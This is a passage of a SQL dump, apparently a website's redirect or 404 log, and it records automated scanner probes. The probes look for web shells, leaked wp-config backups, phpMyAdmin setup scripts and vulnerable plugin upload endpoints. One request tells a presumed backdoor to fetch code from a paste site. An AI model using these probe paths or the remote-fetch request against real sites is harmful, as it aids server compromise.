00:00:00',301),(20002,'https://ekvatorprint.com.ua/-/~/code87/ijo.php',NULL,'http://ekvatorprint.com.ua/-/~/code87/ijo.php','',1,0,'2021-03-28 04:31:47','0000-00-00 00:00:00',301),(20003,'https://ekvatorprint.com.ua/_install/template/css/kkooycj.php',NULL,'http://ekvatorprint.com.ua/_install/template/css/kkooycj.php','',2,0,'2021-03-28 05:08:24','0000-00-00 00:00:00',301),(20004,'https://ekvatorprint.com.ua/wp-admin/network/settings.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/settings.php','',1,0,'2021-03-28 05:09:17','0000-00-00 00:00:00',301),(20005,'https://ekvatorprint.com.ua/wp-content/themes/distance-lite/languages/pref.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/distance-lite/languages/pref.php','',1,0,'2021-03-28 05:37:12','0000-00-00 00:00:00',301),(20006,'https://ekvatorprint.com.ua/components/com_config/model/prmnbne.php',NULL,'http://ekvatorprint.com.ua/components/com_config/model/prmnbne.php','',1,0,'2021-03-28 06:13:42','0000-00-00 00:00:00',301),(20007,'https://ekvatorprint.com.ua/5index.php',NULL,'http://ekvatorprint.com.ua/5index.php','',3,0,'2021-03-28 06:29:14','0000-00-00 00:00:00',301),(20008,'https://ekvatorprint.com.ua/beence.php.suspected',NULL,'http://ekvatorprint.com.ua/beence.php.suspected','',1,0,'2021-03-28 07:05:43','0000-00-00 00:00:00',301),(20009,'https://ekvatorprint.com.ua/components/com_content/models/index.php',NULL,'http://ekvatorprint.com.ua/components/com_content/models/index.php','',1,0,'2021-03-28 07:24:13','0000-00-00 00:00:00',301),(20010,'https://ekvatorprint.com.ua/wp-admin/options-general.php',NULL,'http://ekvatorprint.com.ua/wp-admin/options-general.php','',1,0,'2021-03-28 07:35:00','0000-00-00 00:00:00',301),(20011,'https://ekvatorprint.com.ua/wp-admin/my-sites.php',NULL,'http://ekvatorprint.com.ua/wp-admin/my-sites.php','',3,0,'2021-03-28 07:51:52','0000-00-00 00:00:00',301),(20012,'https://ekvatorprint.com.ua/wp-content/plugins/wordfence/modules/login-security/classes/model/wp-pingg.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wordfence/modules/login-security/classes/model/wp-pingg.php','',2,0,'2021-03-28 07:53:10','0000-00-00 00:00:00',301),(20013,'https://ekvatorprint.com.ua/components/com_jce/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_jce/views/index.php','',1,0,'2021-03-28 08:22:39','0000-00-00 00:00:00',301),(20014,'https://ekvatorprint.com.ua/index.php/component/k2/item/29',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/29','',1,0,'2021-03-28 08:24:40','0000-00-00 00:00:00',301),(20015,'https://ekvatorprint.com.ua/wp-config.inc',NULL,'','',2,0,'2021-03-28 09:07:40','0000-00-00 00:00:00',301),(20016,'https://ekvatorprint.com.ua/wp-config.old',NULL,'','',2,0,'2021-03-28 09:07:40','0000-00-00 00:00:00',301),(20017,'https://ekvatorprint.com.ua/wp-config.txt',NULL,'','',5,0,'2021-03-28 09:07:40','0000-00-00 00:00:00',301),(20018,'https://ekvatorprint.com.ua/wp-config.php.txt',NULL,'','',7,0,'2021-03-28 09:07:40','0000-00-00 00:00:00',301),(20019,'https://ekvatorprint.com.ua/wp-config.php.dist',NULL,'','',2,0,'2021-03-28 09:07:41','0000-00-00 00:00:00',301),(20020,'https://ekvatorprint.com.ua/wp-config.php.inc',NULL,'','',2,0,'2021-03-28 09:07:41','0000-00-00 00:00:00',301),(20021,'https://ekvatorprint.com.ua/wp-config.php.html',NULL,'','',1,0,'2021-03-28 09:07:41','0000-00-00 00:00:00',301),(20022,'https://ekvatorprint.com.ua/wp-config-backup.txt',NULL,'','',2,0,'2021-03-28 09:07:42','0000-00-00 00:00:00',301),(20023,'https://ekvatorprint.com.ua/_wpeprivate/config.json',NULL,'','',2,0,'2021-03-28 09:07:42','0000-00-00 00:00:00',301),(20024,'https://ekvatorprint.com.ua/components/com_search/views/views.php',NULL,'http://ekvatorprint.com.ua/components/com_search/views/views.php','',1,0,'2021-03-28 09:55:31','0000-00-00 00:00:00',301),(20025,'https://ekvatorprint.com.ua/application.wadl',NULL,'','',2,0,'2021-03-28 10:33:19','0000-00-00 00:00:00',301),(20026,'https://ekvatorprint.com.ua/api/application.wadl',NULL,'','',1,0,'2021-03-28 10:33:20','0000-00-00 00:00:00',301),(20027,'https://ekvatorprint.com.ua/api/v1/application.wadl',NULL,'','',1,0,'2021-03-28 10:33:20','0000-00-00 00:00:00',301),(20028,'https://ekvatorprint.com.ua/api/v2/application.wadl',NULL,'','',1,0,'2021-03-28 10:33:20','0000-00-00 00:00:00',301),(20029,'https://ekvatorprint.com.ua/wp-content/themes/distance-lite/languages/longer.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/distance-lite/languages/longer.php','',1,0,'2021-03-28 10:44:22','0000-00-00 00:00:00',301),(20030,'https://ekvatorprint.com.ua/index.php/component/k2/item/16',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/16','',1,0,'2021-03-28 10:57:56','0000-00-00 00:00:00',301),(20031,'https://ekvatorprint.com.ua/bin/logs.php',NULL,'http://ekvatorprint.com.ua/bin/logs.php','',2,0,'2021-03-28 11:23:23','0000-00-00 00:00:00',301),(20032,'https://ekvatorprint.com.ua/wp-content/uploads/404.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/404.php','',3,0,'2021-03-28 12:20:50','0000-00-00 00:00:00',301),(20033,'https://ekvatorprint.com.ua/cli/851.php',NULL,'http://ekvatorprint.com.ua/cli/851.php','',2,0,'2021-03-28 12:55:39','0000-00-00 00:00:00',301),(20034,'https://ekvatorprint.com.ua/wp-admin/credits.php',NULL,'http://ekvatorprint.com.ua/wp-admin/credits.php','',2,0,'2021-03-28 13:20:59','0000-00-00 00:00:00',301),(20035,'https://ekvatorprint.com.ua/index.php/component/k2/item/18',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/18','',1,0,'2021-03-28 14:12:34','0000-00-00 00:00:00',301),(20036,'https://ekvatorprint.com.ua/index.php/component/k2/item/28',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/28','',1,0,'2021-03-28 14:53:18','0000-00-00 00:00:00',301),(20037,'https://ekvatorprint.com.ua/components/com_weblinks/models/setup.php',NULL,'http://ekvatorprint.com.ua/components/com_weblinks/models/setup.php','',1,0,'2021-03-28 14:54:40','0000-00-00 00:00:00',301),(20038,'https://ekvatorprint.com.ua/index.php/component/k2/item/12',NULL,'http://ekvatorprint.com.ua/index.php/component/k2/item/12','',1,0,'2021-03-28 15:58:10','0000-00-00 00:00:00',301),(20039,'https://ekvatorprint.com.ua/wp-admin/theme-editor.php',NULL,'http://ekvatorprint.com.ua/wp-admin/theme-editor.php','',1,0,'2021-03-28 17:28:22','0000-00-00 00:00:00',301),(20040,'https://ekvatorprint.com.ua/components/com_allvideoshare/assets/js/wp-side.php',NULL,'http://ekvatorprint.com.ua/components/com_allvideoshare/assets/js/wp-side.php','',1,0,'2021-03-28 17:29:33','0000-00-00 00:00:00',301),(20041,'https://ekvatorprint.com.ua/cache/xindex.php',NULL,'http://ekvatorprint.com.ua/cache/xindex.php','',2,0,'2021-03-28 17:30:44','0000-00-00 00:00:00',301),(20042,'https://ekvatorprint.com.ua/cargo-perev.ru/wp-includes/requests/cookie/images.php',NULL,'http://ekvatorprint.com.ua/cargo-perev.ru/wp-includes/Requests/Cookie/images.php','',2,0,'2021-03-28 17:38:35','0000-00-00 00:00:00',301),(20043,'https://ekvatorprint.com.ua/87/ijo.php',NULL,'http://ekvatorprint.com.ua/87/ijo.php','',1,0,'2021-03-28 17:47:43','0000-00-00 00:00:00',301),(20044,'https://ekvatorprint.com.ua/wp-admin/network/site-info.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/site-info.php','',1,0,'2021-03-28 18:02:47','0000-00-00 00:00:00',301),(20045,'https://ekvatorprint.com.ua/wp-admin/export.php',NULL,'http://ekvatorprint.com.ua/wp-admin/export.php','',1,0,'2021-03-28 18:22:00','0000-00-00 00:00:00',301),(20046,'https://ekvatorprint.com.ua/components/com_foxcontact/tim.php',NULL,'http://ekvatorprint.com.ua/components/com_foxcontact/tim.php','',1,0,'2021-03-28 18:27:35','0000-00-00 00:00:00',301),(20047,'https://ekvatorprint.com.ua/phpmaila/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/phpmaila/popup-pomo.php','',1,0,'2021-03-28 18:53:40','0000-00-00 00:00:00',301),(20048,'https://ekvatorprint.com.ua/components/com_contact/pp1.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/pp1.php','',2,0,'2021-03-28 19:34:17','0000-00-00 00:00:00',301),(20049,'https://ekvatorprint.com.ua/_phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2021-03-28 19:46:40','0000-00-00 00:00:00',301),(20050,'https://ekvatorprint.com.ua/forum/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2021-03-28 19:46:40','0000-00-00 00:00:00',301),(20051,'https://ekvatorprint.com.ua/php/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2021-03-28 19:46:40','0000-00-00 00:00:00',301),(20052,'https://ekvatorprint.com.ua/typo3/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2021-03-28 19:46:40','0000-00-00 00:00:00',301),(20053,'https://ekvatorprint.com.ua/web/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2021-03-28 19:46:41','0000-00-00 00:00:00',301),(20054,'https://ekvatorprint.com.ua/xampp/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2021-03-28 19:46:41','0000-00-00 00:00:00',301),(20055,'https://ekvatorprint.com.ua/sysadmin/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2021-03-28 19:46:41','0000-00-00 00:00:00',301),(20056,'https://ekvatorprint.com.ua/wp-admin/edit-tags.php',NULL,'http://ekvatorprint.com.ua/wp-admin/edit-tags.php','',1,0,'2021-03-28 20:21:46','0000-00-00 00:00:00',301),(20057,'https://ekvatorprint.com.ua/alfa.php.suspected',NULL,'http://ekvatorprint.com.ua/alfa.php.suspected','',1,0,'2021-03-28 21:20:27','0000-00-00 00:00:00',301),(20058,'https://ekvatorprint.com.ua/wp-admin/ms-sites.php',NULL,'http://ekvatorprint.com.ua/wp-admin/ms-sites.php','',2,0,'2021-03-28 21:24:17','0000-00-00 00:00:00',301),(20059,'https://ekvatorprint.com.ua/canadapost/popup-pomo.php',NULL,'http://ekvatorprint.com.ua/canadapost/popup-pomo.php','',1,0,'2021-03-28 21:37:20','0000-00-00 00:00:00',301),(20060,'https://ekvatorprint.com.ua/cache/sok.php',NULL,'http://ekvatorprint.com.ua/cache/sok.php','',1,0,'2021-03-28 21:46:54','0000-00-00 00:00:00',301),(20061,'https://ekvatorprint.com.ua/class-wp-inc.php',NULL,'http://ekvatorprint.com.ua/class-wp-inc.php','',1,0,'2021-03-28 21:47:29','0000-00-00 00:00:00',301),(20062,'https://ekvatorprint.com.ua/wp-content/plugins/letme/weblinks.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/letme/weblinks.php','',3,0,'2021-03-28 22:20:27','0000-00-00 00:00:00',301),(20063,'https://ekvatorprint.com.ua/ash.php',NULL,'http://ekvatorprint.com.ua/ash.php','',1,0,'2021-03-29 06:02:31','0000-00-00 00:00:00',301),(20064,'https://ekvatorprint.com.ua/ollx.php',NULL,'http://ekvatorprint.com.ua/ollx.php','',1,0,'2021-03-29 07:23:57','0000-00-00 00:00:00',301),(20065,'https://ekvatorprint.com.ua/components/com_contact/views/index.php',NULL,'http://ekvatorprint.com.ua/components/com_contact/views/index.php','',1,0,'2021-03-29 09:26:01','0000-00-00 00:00:00',301),(20066,'https://ekvatorprint.com.ua/wp-admin/network/upgrade.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/upgrade.php','',1,0,'2021-03-29 13:01:15','0000-00-00 00:00:00',301),(20067,'https://ekvatorprint.com.ua/qinhers.php',NULL,'http://ekvatorprint.com.ua/qinhers.php','',1,0,'2021-03-29 18:13:26','0000-00-00 00:00:00',301),(20068,'https://ekvatorprint.com.ua/admin/view/stylesheet/doc.php',NULL,'http://ekvatorprint.com.ua/admin/view/stylesheet/doc.php','',1,0,'2021-03-29 18:29:32','0000-00-00 00:00:00',301),(20069,'https://ekvatorprint.com.ua/sites/all/themes/hatch/doc.php',NULL,'http://ekvatorprint.com.ua/sites/all/themes/hatch/doc.php','',1,0,'2021-03-29 19:01:38','0000-00-00 00:00:00',301),(20070,'https://ekvatorprint.com.ua/im.php',NULL,'http://ekvatorprint.com.ua/im.php','',5,0,'2021-03-29 19:01:45','0000-00-00 00:00:00',301),(20071,'https://ekvatorprint.com.ua/bitrix/templates/print/lang/en/en.php',NULL,'http://ekvatorprint.com.ua/bitrix/templates/print/lang/en/en.php','',2,0,'2021-03-29 19:15:19','0000-00-00 00:00:00',301),(20072,'https://ekvatorprint.com.ua/ximist.php',NULL,'http://ekvatorprint.com.ua/ximist.php','',1,0,'2021-03-29 19:17:42','0000-00-00 00:00:00',301),(20073,'https://ekvatorprint.com.ua/bitrix/templates/.default/ajax/images/doc.php',NULL,'http://ekvatorprint.com.ua/bitrix/templates/.default/ajax/images/doc.php','',1,0,'2021-03-29 19:18:40','0000-00-00 00:00:00',301),(20074,'https://ekvatorprint.com.ua/libraries/joomla/template/55index.php',NULL,'http://ekvatorprint.com.ua/libraries/joomla/template/55index.php','',2,0,'2021-03-29 19:39:09','0000-00-00 00:00:00',301),(20075,'https://ekvatorprint.com.ua/includes/as.php',NULL,'http://ekvatorprint.com.ua/includes/as.php','',2,0,'2021-03-29 19:48:38','0000-00-00 00:00:00',301),(20076,'https://ekvatorprint.com.ua/admin/language/en-gb/extension/extension/doc.php',NULL,'http://ekvatorprint.com.ua/admin/language/en-gb/extension/extension/doc.php','',1,0,'2021-03-29 20:05:44','0000-00-00 00:00:00',301),(20077,'https://ekvatorprint.com.ua/admin/controller/extension/module/opheadar.php',NULL,'http://ekvatorprint.com.ua/admin/controller/extension/module/opheadar.php','',3,0,'2021-03-29 20:06:40','0000-00-00 00:00:00',301),(20078,'https://ekvatorprint.com.ua/cender.php',NULL,'http://ekvatorprint.com.ua/cender.php','',1,0,'2021-03-30 00:49:12','0000-00-00 00:00:00',301),(20079,'https://ekvatorprint.com.ua/admin/controller/extension/module/lpinfos.php',NULL,'http://ekvatorprint.com.ua/admin/controller/extension/module/lpinfos.php','',1,0,'2021-03-30 01:01:21','0000-00-00 00:00:00',301),(20080,'https://ekvatorprint.com.ua/admin/view/stylesheet/content-post.php',NULL,'http://ekvatorprint.com.ua/admin/view/stylesheet/content-post.php','',1,0,'2021-03-30 01:07:49','0000-00-00 00:00:00',301),(20081,'https://ekvatorprint.com.ua/license.php.suspected',NULL,'http://ekvatorprint.com.ua/license.php.suspected','',1,0,'2021-03-30 01:17:07','0000-00-00 00:00:00',301),(20082,'https://ekvatorprint.com.ua/api/v1',NULL,'','',1,0,'2021-03-30 01:52:44','0000-00-00 00:00:00',301),(20083,'https://ekvatorprint.com.ua/api/v2',NULL,'','',1,0,'2021-03-30 01:52:44','0000-00-00 00:00:00',301),(20084,'https://ekvatorprint.com.ua/admin/language/en-gb/extension/extension/ups.php',NULL,'http://ekvatorprint.com.ua/admin/language/en-gb/extension/extension/ups.php','',1,0,'2021-03-30 03:07:15','0000-00-00 00:00:00',301),(20085,'https://ekvatorprint.com.ua/sites/all/themes/hatch/ups.php',NULL,'http://ekvatorprint.com.ua/sites/all/themes/hatch/ups.php','',5,0,'2021-03-30 03:34:57','0000-00-00 00:00:00',301),(20086,'https://ekvatorprint.com.ua/admin/controller/extension/module/baf77541e756.php',NULL,'http://ekvatorprint.com.ua/admin/controller/extension/module/BAF77541E756.php','',3,0,'2021-03-30 04:05:22','0000-00-00 00:00:00',301),(20087,'https://ekvatorprint.com.ua/zname.php',NULL,'http://ekvatorprint.com.ua/zname.php','',1,0,'2021-03-30 05:58:10','0000-00-00 00:00:00',301),(20088,'https://ekvatorprint.com.ua/confg.php',NULL,'http://ekvatorprint.com.ua/confg.php','',1,0,'2021-03-30 06:29:53','0000-00-00 00:00:00',301),(20089,'https://ekvatorprint.com.ua/fckeditor/editor/filemanager/browser/default/frmupload.html',NULL,'','',1,0,'2021-03-30 11:36:42','0000-00-00 00:00:00',301),(20090,'https://ekvatorprint.com.ua/swagger/index.html',NULL,'','',1,0,'2021-04-02 00:39:59','0000-00-00 00:00:00',301),(20091,'https://ekvatorprint.com.ua/swagger-ui.html',NULL,'','',1,0,'2021-04-02 00:39:59','0000-00-00 00:00:00',301),(20092,'https://ekvatorprint.com.ua/swagger/swagger-ui.html',NULL,'','',1,0,'2021-04-02 00:39:59','0000-00-00 00:00:00',301),(20093,'https://ekvatorprint.com.ua/api/swagger-ui.html',NULL,'','',1,0,'2021-04-02 00:39:59','0000-00-00 00:00:00',301),(20094,'https://ekvatorprint.com.ua/api-docs/swagger.json',NULL,'','',1,0,'2021-04-02 00:39:59','0000-00-00 00:00:00',301),(20095,'https://ekvatorprint.com.ua/api-docs/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:39:59','0000-00-00 00:00:00',301),(20096,'https://ekvatorprint.com.ua/swagger.json',NULL,'','',1,0,'2021-04-02 00:39:59','0000-00-00 00:00:00',301),(20097,'https://ekvatorprint.com.ua/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:00','0000-00-00 00:00:00',301),(20098,'https://ekvatorprint.com.ua/swagger/v1/swagger.json',NULL,'','',1,0,'2021-04-02 00:40:00','0000-00-00 00:00:00',301),(20099,'https://ekvatorprint.com.ua/swagger/v1/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:00','0000-00-00 00:00:00',301),(20100,'https://ekvatorprint.com.ua/api/index.html',NULL,'','',1,0,'2021-04-02 00:40:00','0000-00-00 00:00:00',301),(20101,'https://ekvatorprint.com.ua/api/docs/',NULL,'','',1,0,'2021-04-02 00:40:00','0000-00-00 00:00:00',301),(20102,'https://ekvatorprint.com.ua/api/swagger.json',NULL,'','',1,0,'2021-04-02 00:40:00','0000-00-00 00:00:00',301),(20103,'https://ekvatorprint.com.ua/api/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:01','0000-00-00 00:00:00',301),(20104,'https://ekvatorprint.com.ua/api/swagger.yml',NULL,'','',1,0,'2021-04-02 00:40:01','0000-00-00 00:00:00',301),(20105,'https://ekvatorprint.com.ua/api/swagger/index.html',NULL,'','',1,0,'2021-04-02 00:40:01','0000-00-00 00:00:00',301),(20106,'https://ekvatorprint.com.ua/api/swagger/swagger-ui.html',NULL,'','',1,0,'2021-04-02 00:40:01','0000-00-00 00:00:00',301),(20107,'https://ekvatorprint.com.ua/api/api-docs/swagger.json',NULL,'','',1,0,'2021-04-02 00:40:01','0000-00-00 00:00:00',301),(20108,'https://ekvatorprint.com.ua/api/api-docs/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:01','0000-00-00 00:00:00',301),(20109,'https://ekvatorprint.com.ua/api/swagger-ui/swagger.json',NULL,'','',1,0,'2021-04-02 00:40:01','0000-00-00 00:00:00',301),(20110,'https://ekvatorprint.com.ua/api/swagger-ui/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:02','0000-00-00 00:00:00',301),(20111,'https://ekvatorprint.com.ua/api/apidocs/swagger.json',NULL,'','',1,0,'2021-04-02 00:40:02','0000-00-00 00:00:00',301),(20112,'https://ekvatorprint.com.ua/api/apidocs/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:02','0000-00-00 00:00:00',301),(20113,'https://ekvatorprint.com.ua/api/swagger-ui/api-docs',NULL,'','',1,0,'2021-04-02 00:40:02','0000-00-00 00:00:00',301),(20114,'https://ekvatorprint.com.ua/api/api-docs',NULL,'','',1,0,'2021-04-02 00:40:02','0000-00-00 00:00:00',301),(20115,'https://ekvatorprint.com.ua/api/apidocs',NULL,'','',1,0,'2021-04-02 00:40:02','0000-00-00 00:00:00',301),(20116,'https://ekvatorprint.com.ua/api/swagger',NULL,'','',1,0,'2021-04-02 00:40:03','0000-00-00 00:00:00',301),(20117,'https://ekvatorprint.com.ua/api/swagger/static/index.html',NULL,'','',1,0,'2021-04-02 00:40:03','0000-00-00 00:00:00',301),(20118,'https://ekvatorprint.com.ua/api/swagger-resources',NULL,'','',1,0,'2021-04-02 00:40:03','0000-00-00 00:00:00',301),(20119,'https://ekvatorprint.com.ua/api/swagger-resources/restservices/v2/api-docs',NULL,'','',1,0,'2021-04-02 00:40:03','0000-00-00 00:00:00',301),(20120,'https://ekvatorprint.com.ua/api/__swagger__/',NULL,'','',1,0,'2021-04-02 00:40:03','0000-00-00 00:00:00',301),(20121,'https://ekvatorprint.com.ua/api/_swagger_/',NULL,'','',1,0,'2021-04-02 00:40:03','0000-00-00 00:00:00',301),(20122,'https://ekvatorprint.com.ua/api/spec/swagger.json',NULL,'','',1,0,'2021-04-02 00:40:03','0000-00-00 00:00:00',301),(20123,'https://ekvatorprint.com.ua/api/spec/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:04','0000-00-00 00:00:00',301),(20124,'https://ekvatorprint.com.ua/api/swagger/ui/index',NULL,'','',1,0,'2021-04-02 00:40:04','0000-00-00 00:00:00',301),(20125,'https://ekvatorprint.com.ua/__swagger__/',NULL,'','',1,0,'2021-04-02 00:40:04','0000-00-00 00:00:00',301),(20126,'https://ekvatorprint.com.ua/_swagger_/',NULL,'','',1,0,'2021-04-02 00:40:04','0000-00-00 00:00:00',301),(20127,'https://ekvatorprint.com.ua/api/v1/swagger-ui/swagger.json',NULL,'','',1,0,'2021-04-02 00:40:04','0000-00-00 00:00:00',301),(20128,'https://ekvatorprint.com.ua/api/v1/swagger-ui/swagger.yaml',NULL,'','',1,0,'2021-04-02 00:40:04','0000-00-00 00:00:00',301),(20129,'https://ekvatorprint.com.ua/swagger-resources/restservices/v2/api-docs',NULL,'','',1,0,'2021-04-02 00:40:05','0000-00-00 00:00:00',301),(20130,'https://ekvatorprint.com.ua/_ignition/health-check/',NULL,'http://ekvatorprint.com.ua/_ignition/health-check/','',6,0,'2021-04-02 08:18:06','0000-00-00 00:00:00',301),(20131,'https://ekvatorprint.com.ua/wp-content/plugins/ioptimization/ioptimizes.php?hamlorszd',NULL,'','',1,0,'2021-04-02 22:21:05','0000-00-00 00:00:00',301),(20132,'https://ekvatorprint.com.ua/blog/wp-content/plugins/ioptimization/ioptimizes.php?hamlorszd',NULL,'','',1,0,'2021-04-02 22:21:07','0000-00-00 00:00:00',301),(20133,'https://ekvatorprint.com.ua/wp/wp-content/plugins/ioptimization/ioptimizes.php?hamlorszd',NULL,'','',1,0,'2021-04-02 22:21:08','0000-00-00 00:00:00',301),(20134,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/ioptimization/ioptimizes.php?hamlorszd',NULL,'','',1,0,'2021-04-02 22:21:08','0000-00-00 00:00:00',301),(20135,'https://ekvatorprint.com.ua/banner-printingэкватор принт',NULL,'','',2,0,'2021-04-04 11:27:44','0000-00-00 00:00:00',301),(20136,'https://ekvatorprint.com.ua/xmlrp.php?url=https://textbin.net/raw/feemcpvmob',NULL,'www.google.com','',6,0,'2021-04-04 11:51:59','0000-00-00 00:00:00',301),(20137,'https://ekvatorprint.com.ua/jsys.php',NULL,'','',1,0,'2021-04-06 19:42:42','0000-00-00 00:00:00',301),(20138,'https://ekvatorprint.com.ua/laravel/_ignition/health-check/',NULL,'http://ekvatorprint.com.ua/laravel/_ignition/health-check/','',2,0,'2021-04-08 22:52:28','0000-00-00 00:00:00',301),(20139,'https://ekvatorprint.com.ua/wp/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 06:56:37','0000-00-00 00:00:00',301),(20140,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 06:57:21','0000-00-00 00:00:00',301),(20141,'https://ekvatorprint.com.ua/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 06:58:08','0000-00-00 00:00:00',301),(20142,'https://ekvatorprint.com.ua/new/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 06:58:49','0000-00-00 00:00:00',301),(20143,'https://ekvatorprint.com.ua/old/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 06:59:34','0000-00-00 00:00:00',301),(20144,'https://ekvatorprint.com.ua/demo/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 06:59:57','0000-00-00 00:00:00',301),(20145,'https://ekvatorprint.com.ua/backup/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 07:00:29','0000-00-00 00:00:00',301),(20146,'https://ekvatorprint.com.ua/test/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 07:01:07','0000-00-00 00:00:00',301),(20147,'https://ekvatorprint.com.ua/home/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 07:01:45','0000-00-00 00:00:00',301),(20148,'https://ekvatorprint.com.ua/2020/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 07:02:46','0000-00-00 00:00:00',301),(20149,'https://ekvatorprint.com.ua/ekvatorprint/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2021-04-10 07:03:32','0000-00-00 00:00:00',301),(20150,'https://ekvatorprint.com.ua/components/com_jbusinessdirectory/assets/upload.php',NULL,'http://www.google.com/','',15,0,'2021-04-15 15:18:29','0000-00-00 00:00:00',301),(20151,'https://ekvatorprint.com.ua/ekvatorprint',NULL,'www.google.com','',10,0,'2021-04-16 16:27:39','0000-00-00 00:00:00',301),(20152,'https://ekvatorprint.com.ua/wp-admin',NULL,'www.google.com','',2,0,'2021-04-16 16:28:58','0000-00-00 00:00:00',301),(20153,'https://ekvatorprint.com.ua/wp1',NULL,'www.google.com','',2,0,'2021-04-16 16:29:42','0000-00-00 00:00:00',301),(20154,'https://ekvatorprint.com.ua/new',NULL,'www.google.com','',36,0,'2021-04-16 16:32:47','0000-00-00 00:00:00',301),(20155,'https://ekvatorprint.com.ua/old',NULL,'www.google.com','',35,0,'2021-04-16 16:33:30','0000-00-00 00:00:00',301),(20156,'https://ekvatorprint.com.ua/demo',NULL,'www.google.com','',17,0,'2021-04-16 16:34:04','0000-00-00 00:00:00',301),(20157,'https://ekvatorprint.com.ua/2020',NULL,'www.google.com','',13,0,'2021-04-16 16:38:08','0000-00-00 00:00:00',301),(20158,'https://ekvatorprint.com.ua/2019',NULL,'www.google.com','',13,0,'2021-04-16 16:38:53','0000-00-00 00:00:00',301),(20159,'https://ekvatorprint.com.ua/site',NULL,'www.google.com','',13,0,'2021-04-16 16:39:36','0000-00-00 00:00:00',301),(20160,'https://ekvatorprint.com.ua/a1c266666.php',NULL,'','',1,0,'2021-04-17 12:36:17','0000-00-00 00:00:00',301),(20161,'https://ekvatorprint.com.ua/modules/mod_impact/elements/upload_file.php',NULL,'http://www.google.com/','',1,0,'2021-04-18 05:37:38','0000-00-00 00:00:00',301),(20162,'https://ekvatorprint.com.ua/components/com_bt_portfolio/helpers/uploadify/uploadify.css',NULL,'http://www.google.com/','',1,0,'2021-04-20 08:14:01','0000-00-00 00:00:00',301),(20163,'https://ekvatorprint.com.ua/wp-content/themes/twentyseventeen/404.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/twentyseventeen/404.php','',2,0,'2021-04-23 10:40:30','0000-00-00 00:00:00',301),(20164,'https://ekvatorprint.com.ua/wp-content/wp-muen.php',NULL,'http://ekvatorprint.com.ua/wp-content/wp-muen.php','',6,0,'2021-04-23 11:08:34','0000-00-00 00:00:00',301),(20165,'https://ekvatorprint.com.ua/wp-content/themes/cp20/jss.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/CP20/jss.php','',24,0,'2021-04-23 13:44:11','0000-00-00 00:00:00',301),(20166,'https://ekvatorprint.com.ua/wp-content/uploads/2020/11/doc.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/2020/11/doc.php','',3,0,'2021-04-23 15:12:42','0000-00-00 00:00:00',301),(20167,'https://ekvatorprint.com.ua/wp-admin/network/network.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/network.php','',2,0,'2021-04-23 19:41:51','0000-00-00 00:00:00',301),(20168,'https://ekvatorprint.com.ua/wp-content/uploads/2020/04/content-post.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/2020/04/content-post.php','',1,0,'2021-04-24 09:43:53','0000-00-00 00:00:00',301),(20169,'https://ekvatorprint.com.ua/wp-content/plugins/duplicate-post/duplicate-post.php',NULL,'','',1,0,'2021-04-26 04:05:15','0000-00-00 00:00:00',301),(20170,'https://ekvatorprint.com.ua/wp-content/plugins/ultimate-social-media-icons/ultimate_social_media_icons.php',NULL,'','',1,0,'2021-04-26 04:05:17','0000-00-00 00:00:00',301),(20171,'https://ekvatorprint.com.ua/wp-content/plugins/delete-duplicate-posts/delete-duplicate-posts.php',NULL,'','',1,0,'2021-04-26 04:05:19','0000-00-00 00:00:00',301),(20172,'https://ekvatorprint.com.ua/wp-content/plugins/duplicate-page/duplicatepage.php',NULL,'','',1,0,'2021-04-26 04:05:20','0000-00-00 